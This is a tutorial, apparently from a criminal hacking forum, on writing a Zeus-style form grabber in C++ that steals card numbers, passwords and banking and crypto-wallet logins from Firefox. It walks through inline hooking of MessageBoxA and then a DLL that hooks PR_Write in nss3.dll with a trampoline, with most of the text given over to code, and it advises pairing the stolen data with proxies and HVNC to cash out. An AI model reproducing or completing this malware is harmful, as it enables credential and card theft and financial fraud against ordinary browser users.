Coding form grabber from 0 , banking botnet style

[D2]

Write a form grabber in c++ in 5 minutes, zeus botnet style for form-grabbing Visa cards, master cards, passwords and emails, and everything the user enters as input in Browser.


Before we dig deeper, What the Hack is a Form grabber, when to use it, and why to use it why not just use a stealer?

#What the Hack is a Form grabber
A form grabber is a technique used by malware developers to steal data such as credit cards and logins data and send them directly to a server and store them in the mysql database then the hacker will come back to check what he stole from his web gui panel and then use them, this technique is very useful when we use it with reverse proxy socks5 for example and no leaks also very very useful with a good and fast hvnc which you can use the same IP same machine that the owner for example of the cvv is used by the owner this gives more trust when cashing out


#when to use it
We use the form grabber most of the time on targets they have access to Important web sites logins, for example, Paypal, bank login, crypto wallet login like blockchain.com, kucoin,
And much more money websites or maybe just a college website maybe the hacker is targeting the admin

#why to use it why not just use a stealer?
A good question you may ask is, why just not use a stealer, will steal everything, logins, cookies, and more?
Ok ok! I will answer this question . ! How many times have you used a stealer and you got expired cookies and an invalid old stored password? A lot of time, so why will use form Grabber this will give you fresh data, some times for example: when you update the password on some web sites the chrome browser will ask you will you want to update or store the password if the target clicks NO and after few hours the cookies expired because the website is very sensitive like blockchain.com with info stealer You get 0 but with the form grabber you get the live email, crypto wallet, and the password

For now good I think you now know why sometimes should use a form grabber! Attention iam not saying info stealers are bad,

#How Does form grabber work?
For example, we need to write a form grabber for Mozilla Firefox the first step is to find the function is responsible for writing the buffer to the server

In Winsock Library we have send and recv the send from its name is responsible for sending data and recv is responsible for receiving data from the server also firefox uses Winsock but it has its own wrapper for the Winsock library which is developed to work with Firefox without problems

And for sending and receiving firefox has PR_WRITE and PR_READ also PR_Recv

According to Firefox source code documentation
https://firefox-source-docs.mozilla.org/nspr/reference/pr_read.html
https://firefox-source-docs.mozilla.org/nspr/reference/pr_write.html


The function PR_READ is responsible for reading the buffer from the server, and the function PR_WRITE is responsible for writing the buffer to the server
For example, we need to log in to paypal.com or twitch.com, or any website, to do that we need to use PR_WRITE to send the username / Email and password to the server and PR_READ to read the result from the server Success Login, Or failed! I mean everything like Html, CSS, JAVASCRIPT, and so on

Today will work on PR_WRITE to steal the login data or credit cards

But before that let's learn About Inline hooking the main technique used by the Formgrabber


#What is Inline Hooking?
Inline Hooking is a technique that allows the attacker or hackers to intercept the function arguments example: like a proxy Burp suit can intercept the http request, also the hooking allows to you to intercept the Arguments, Hooking is widely used by Malware developers, also is used by Antivirus, sandboxes
Since can intercept the arguments of the function so the Antivirus can hook for example WriteProcessMemory And can read the unencrypted buffer you write for example in Process Hollowing

A simple example: We have MessageBoxA which has 4 arguments
int MessageBoxA( [in, optional] HWND hWnd, [in, optional] LPCSTR lpText, [in, optional] LPCSTR lpCaption, [in] UINT uType );

Let's assume we need to interact with this function and need to change its behavior of it like changing the Caption or lpText so to do the job done we need to use Hooking

Keep in mind these are just examples there are a lot of other uses for the Hooking Like userland Hooks, Hooking web browsers, Hooking Putty, and FileZilla also can be done to steal such as sensitive data

So we discuss how Hooking works in Human understanding! Now will discuss the Techniquel way

So A Success API Hooking need these 7 steps so make sure you read them carefully and don't skip any step to make sure this will work for you

1 - Get the original function address
2 - Read the first 5 bytes from the original function
3 - Calculate relative address and write jmp instruction to byte array and relative address
4 - Create a Trampoline function typedef
5 - allocate memory for the Trampoline function
6 - copy the original 5 bytes, copy the Push instruction, and copy the rva then copy the return instruction to the trampoline function
7 - Will done the Hook is done



Inline Hooking can be different with different architecture x32 is different from the x64 inline
When it came to coding Why?

The x64 memory Is too large so the jmp instruction can’t reach the Allocated memory
And to fix this problem we need to find free memory space behind the Target function
Will not discuss the x64 Hooking right now but, will get into it soon when we finish the x86 Hooking project Don’t worry


Since now you already know how does Inline Hooking works, now I will tell you how technically form grabber work

Now there are a few tools you need to download before we start coding

1 - Visual studio IDE

2 - Cheat engine ( I recommend it because so easy to use but you can use any other debugger )

3 - Download Firefox both Archcuter for x32 and x64 because as we discussed before the hooking for x32 will not work for x64 and because will test on both so you need to download both

After you are done downloading the tools now open visual studio and create an Empty c++ project name it Application, And create a c++ file name it test. Cpp
Before we start writing the Form grabber we need to get experienced a little with hooking to do that we first need to write a hook for the MessageBoxA function and intercept the Arguments and change them also print the Old argument in the console

Ok after you create the project and test.cpp file now writes the following c++ code.
C++: Скопировать в буфер обмена

int main(int argc, char* argv[])
{
    HMODULE Huser32dll = GetModuleHandleA("user32.dll");
    FARPROC FunctionAddress = GetProcAddress(Huser32dll, ("MessageBoxA"));

    printf("Original MessageBoxA address 0x%x ", FunctionAddress);
}

This code is very simple We use GetModuleHandleA to retrieve the base address of the module user32.dll as an HMODULE, then we use GetProcAddress to retrieve the address of the exported function we need to import and as you can see printf to print the base address of the function address then we create byte variable finally we use ReadProcessMemory to read the first five bytes

Attention: the minimum number of bytes and its required is 5 bytes 1 for jmp instruction and 4 for the address to jump as an x86, be careful some functions need to copy more than 5 bytes like in PR_WRITE, and will see soon why we need to copy and patch more than 5 bytes.

Good Job we finish the Step 1 which is described above.

Now step two from step seven Calculate the RVA ( relative address between the destination function and the source function which is the Hook function )

Before calculating the Relative address first we need to declare the Hook function as seen in the image bellow

But Hold on, how did we know what arguments we should add to know that we need first to know the original function arguments and the original function arguments as bellow
int MessageBoxA( [in, optional] HWND hWnd, [in, optional] LPCSTR lpText, [in, optional] LPCSTR lpCaption, [in] UINT uType );

So what we need to do is declare the same function with the same data type which is an int but we need only to change the Function name otherwise the project won't be compiled cause will get confused function already declared in WINAPI.
C++: Скопировать в буфер обмена

int main(int argc, char* argv[])
{


    MessageBoxA(NULL, "Test Hooking", "Hooking", NULL);

    HMODULE Huser32dll = GetModuleHandleA("user32.dll");
    FARPROC FunctionAddress = GetProcAddress(Huser32dll, ("MessageBoxA"));

    printf("Original MessageBoxA address 0x%x ", FunctionAddress);

    BYTE    OriginalBytes[5] = { 0 };

    BOOL RDmemory = ReadProcessMemory(GetCurrentProcess(), FunctionAddress, &OriginalBytes, 5, NULL);
}

Now once we finish from declaring the function now we need to Calculate the RVA by passing the address of the Hook function and the address of the original function and adding +5 bytes to the original function this need, after done this we declared a new variable called JmpBytes and the data type is a byte, now we Should copy the jmp instruction to JmpBytes and then copy the relative address to JmpBytes but make sure you add +1 to skip the jmp instruction otherwise it will overwrite on the jmp instruction So be careful any small error it will never work.
C++: Скопировать в буфер обмена

    // calculate RVA

    DWORD RVA = ((DWORD)&MessageBoxB - ((DWORD)FunctionAddress + 5));

    BYTE    JmpCode[5] = { 0 };
    memcpy_s(JmpCode, 1, "\xE9", 1);
    memcpy_s(JmpCode + 1, 4, &RVA, 4);

    // WRITE jmp to function
    WriteProcessMemory(GetCurrentProcess(), FunctionAddress, JmpCode, 5, NULL);

Now go back to MessageBoxB and as you already know its the Hook function can see that in the code above

And the first step we will do is to print out the arguments of the Original MessageBoxA
C++: Скопировать в буфер обмена
printf("lpText : %s lpCaption : %s \n", lpCaption, lpText);

We did not finish yet there is still the trampoline, For now, this code will work and print out the arguments but will crash after that so just for testing purposes add sleep in the Hook function after printing the arguments will not crash directly so we have time to check the function from Cheat engine. so now compile the code and, and Don’t forget to add MessagBoxA to be loaded from user32.dll otherwise you need to use LoadLibraryA, not GetModuleHandle
So finally TEST CODE will be like this

Код: Скопировать в буфер обмена

int MessageBoxB(HWND hWnd, LPCSTR lpText, LPCSTR lpCaption, UINT uType)
{
    printf("lpText : %s lpCaption : %s \n", lpCaption, lpText);
   
    Sleep(10000); // sleep to see the effect before crash because we did not finsihed the full project yet
}

int main(int argc, char* argv[])
{


    MessageBoxA(NULL, "Test Hooking", "Hooking", NULL);

    HMODULE Huser32dll = GetModuleHandleA("user32.dll");
    FARPROC FunctionAddress = GetProcAddress(Huser32dll, ("MessageBoxA"));

    printf("Original MessageBoxA address 0x%x ", FunctionAddress);

    BYTE    OriginalBytes[5] = { 0 };

    BOOL RDmemory = ReadProcessMemory(GetCurrentProcess(), FunctionAddress, &OriginalBytes, 5, NULL);


    // calculate RVA

    DWORD RVA = ((DWORD)&MessageBoxB - ((DWORD)FunctionAddress + 5));

    BYTE    JmpCode[5] = { 0 };
    memcpy_s(JmpCode, 1, "\xE9", 1);
    memcpy_s(JmpCode + 1, 4, &RVA, 4);

    // WRITE jmp to function
    WriteProcessMemory(GetCurrentProcess(), FunctionAddress, JmpCode, 5, NULL);
   
    MessageBoxA(NULL, "Test Hooking", "Hooking", NULL);
   
    return 0;
}

Now open the cheat engine and launch the Application.exe and go to MessageBoxA and set A BreakPoint on the MessageBoxA function

To find the Function MessageBoxA first after attaching to the application go to Memory view -> then view -> then enumerate dlls and symbols and click on it finally search for MessageBoxA And click on the function name

As you can see the function before the hooking

Now click on the message box

And this is the first one before the Hooking after clicking it the hooking will be done and should see the arguments printed on the CMD

As you can see now after the Hook is done see the Cmd printed the MessageBoxA arguments!
Is only that? No, we also can modify it and change the original message box arguments that were entered by the developer and pass our own. but before we do that we need to create the trampoline otherwise it will get crashed as of now.

To create the trampoline function.
1 - First create a typedef from the MessagBoxA function
2 - Create an LPVOID variable and will be the trampoline make sure to make the variable PUBLIC as in the code bellow

3 - Allocate Memory using VirtualAlloc for and make sure the make the page permissions PAGE_EXECUTE_READWRITE and the size will be 11! how did I know the size
To calculate the size first we need to add the bytes we copy i mean the original 5 bytes then 1 for push and 4 for the RVA and 1 for the return the total is 11 so we need to allocate memory size 11

4 - Copy the Original 5 bytes we copy in the first time
5 - copy the push instruction but again you need to add +5 and the five represent the bytes size so we skip the first 5 bytes and do not overwrite them
6 - Copy the Rva ( Relative address )
7 - Copy the return instruction

Now back to the Hook function MessageBoxB that we create and now will edit the arguments of the Orignal MessageBoxA function
Now create a pointer to the trampoline address that we allocate before and assign the type of the typedef we create ftrempolineMessageBox and make the return to it now you can pass whatever string you want in the arguments see the image bellow

Will done we finish the Hooking, and this is the full code without the sleep
[cpp]

Compile the code and run it and now should work without any error

As you can see in the message box the text is changed to my text
Video of working proof


Attention: Until now we are working on the same exe in the next section will work from dll and inject Dll to the Firefox process then will install hook from the Dll will patch the jump and read the Buffer from the Hook function of PR_WRITE but now will not read MessageBoxA now will read the buffer that the browser sends it to the server and parse the username and password

Congratulations.


Now create two other projects both are Empty c++ projects the first one name it hook and the other name it injector

Go to hook and go to project properties and then -> Advanced and change the target extension to .dll


Now create injector.cpp and hook.cpp in the both projects
C++: Скопировать в буфер обмена

BOOL APIENTRY DllMain(HMODULE hModule, DWORD  ul_reason_for_call, LPVOID lpReserved) {

 

    switch (ul_reason_for_call)
    {
    case DLL_PROCESS_ATTACH:
        CreateThread(NULL, NULL, (LPTHREAD_START_ROUTINE)InstallHook, NULL, 0, 0);

        break;
    case DLL_THREAD_ATTACH:
    case DLL_THREAD_DETACH:
    case DLL_PROCESS_DETACH:
        break;
    }
    return TRUE;
}

Add the code above to the hook.cpp file .

No big deal we just write the entry point of the DLL and create a thread to invoke our function called Installhook, The function Installhook is the function that will be used to install the hook and create the trampoline.

Now there are a few requirements we need to find and define it in the c++ file , as we do before we need to find the type and arguments used by PR_WRITE we do that on MessageBoxA in the above code

Thanks GOD the Firefox source code are available on Firefox source documentation
https://firefox-source-docs.mozilla.org/
Go to https://firefox-source-docs.mozilla.org/nspr/reference/pr_write.html to find the PR_WRITE
And then create a typedef from the function also create A hook function from the PR_WRITE function

PRInt32 PR_Write(PRFileDesc *fd, const void *buf,PRInt32 amount);

Now your code should be like this .

C++: Скопировать в буфер обмена

typedef int (*PTRPR_Write)(SOCKET* fd, char * buf, int amount);

LPVOID TrempolineAddress = NULL;

int HPR_Write(SOCKET* fd, char * buf, int amount)
{

    PTRPR_Write fTRPR_Write = (PTRPR_Write)TrempolineAddress;

    return fTRPR_Write(fd, buf, amount);
}

As you can see I changed the PRFileDesc to SOCKET pointer and const void You also can change it to char*

Will I guess you already know what is that, don’t worry about the return function to the trampoline address will allocate the memory from InstallHook Function

For more debugging information we can allocate the Console using the code above

C++: Скопировать в буфер обмена

AllocConsole();
 freopen("CONOUT$", "w", stdout);

Add the code to the InstallHook function

Now here before we read the bytes from the Original Function ! did you remember when I told you above some functions need to read and patch more than five bytes?

Now I will tell you why is that, first launch the Firefox Browser and second launch Cheatengine and attach to Firefox

Click Open then Memory view and then view from the toolbar of cheat engine and finally click on Enumerate dlls and symbols

Or just on your keyboard use hots keys to open the Enumerate dlls and symbols by typing
Ctrl + alt + s

Now search for PR_WRITE once the cheat engine find it click on it

It should take you to the PR_WRITE function

Good now focus on the PR_WRITE function and read the first five bytes can’t true? yes true if we copy the five bytes this will break the mov esi,[ebp+10]
So to fix this problem we need to Copy Seven bytes instead of five bytes which is From push EPB until move esi, Why? cause as you already know the jmp instruction is 1 byte size and the address we want to jump to it is four bytes so the total is five but we can also copy more than five like in this situation we have

Now back to Visual Studio and add the following code to the function InstallHook .
C++: Скопировать в буфер обмена

 /// 2
    byte    OriginalBytes[7];
    DWORD   ReadedBytes = 0;
    DWORD   BytesSize = 7;
    FARPROC  OriginalPrWriteAddress = GetProcAddress(GetModuleHandleA("nss3.dll"), "PR_Write");

    printf("Original PR_WRITE Function address at 0x%x ", OriginalPrWriteAddress);

    BOOL readbytes = ReadProcessMemory(GetCurrentProcess(), (LPVOID)OriginalPrWriteAddress, &OriginalBytes, BytesSize,&ReadedBytes);


    /// 3
    if (readbytes != FALSE && BytesSize == ReadedBytes)
    {
        byte JmpBytes[7];
        DWORD WrittenBytes = 0;
        DWORD dstFunction = (DWORD)&HPR_Write;

        DWORD Rva = dstFunction - ((DWORD)OriginalPrWriteAddress + 5);

        memcpy_s(JmpBytes, 1, "\xE9", 1);
        memcpy_s(JmpBytes + 1, 4, &Rva, 4);
        memcpy_s(JmpBytes + 5, 1, "\x90", 1);
        memcpy_s(JmpBytes + 6, 1, "\x90", 1);

       BOOL WriteJmp =  WriteProcessMemory(GetCurrentProcess(), (LPVOID)OriginalPrWriteAddress, JmpBytes, BytesSize, &WrittenBytes);


       /// 4
       if (WriteJmp != FALSE && BytesSize == WrittenBytes)
       {
           // here the code of trempoline function
       }
    }

So here we getting the address of the module Or Dll which is nss3 for the Firefox Browser and the function Name is PR_WRITE, then we read the seven bytes from the original function
Check if there an error while reading the bytes if no error calculate the RVA ( Relative address )
Then Copy the Jump instruction to the byte array variable, now copy the Relative address to
The same variable which is the byte array finally copy the /xE9 which is nop or do nothing code this nop is not required in all Inline Hooks if you remember when we hook the MessageBoxA function we didn't use the nop that because there is no extra bytes like in PR_WRITE function
I hope you understand me.
Attention we can use memcpy as an Alternative to ReadProcessMemory and WriteProcessMemory But then you will need to use VirtualProtect to change the protection of the address where you will copy the bytes and restore it to the original protection Once you are done.

Now use WriteProcessMemory to write the Hook or Jump instruction to the Original Function
And Don’t worry the function WriteProcessMemory will do the protection changing for us and don’t need to use VirtualProtect here.
Now if you are smart and focus on the code you will see when we calculate the Relative address we add five +5, not +7 why? this is because as we say before the Jump Instruction and the address is five bytes in the x86 System.

Ok now we just using an if statement to check if there is any error while writing the bytes if no error
Now will create the Trampoline so the size of the trampoline is different we Copy 7 bytes and the the push instruction is 1 byte and the Rva is 4 bytes and the return is also 1 byte so the total is 13 bytes here is how we calculate them

No copy of all that using memcpy_s and no need to use WriteProcessMemory cause the address is already allocated and we copy them directly

Will Done, Awesome now launch the cheat engine and Firefox and Process hacker to inject our dll in Firefox
Here I will record a video to show you the full POC proof of concepts of the working DLL

Will done I hope you enjoy the tutorial if you need any help iam ready to help.

You can find the Project Source code here :
No password.

If you like it tell me in comment i will add more tutorial in future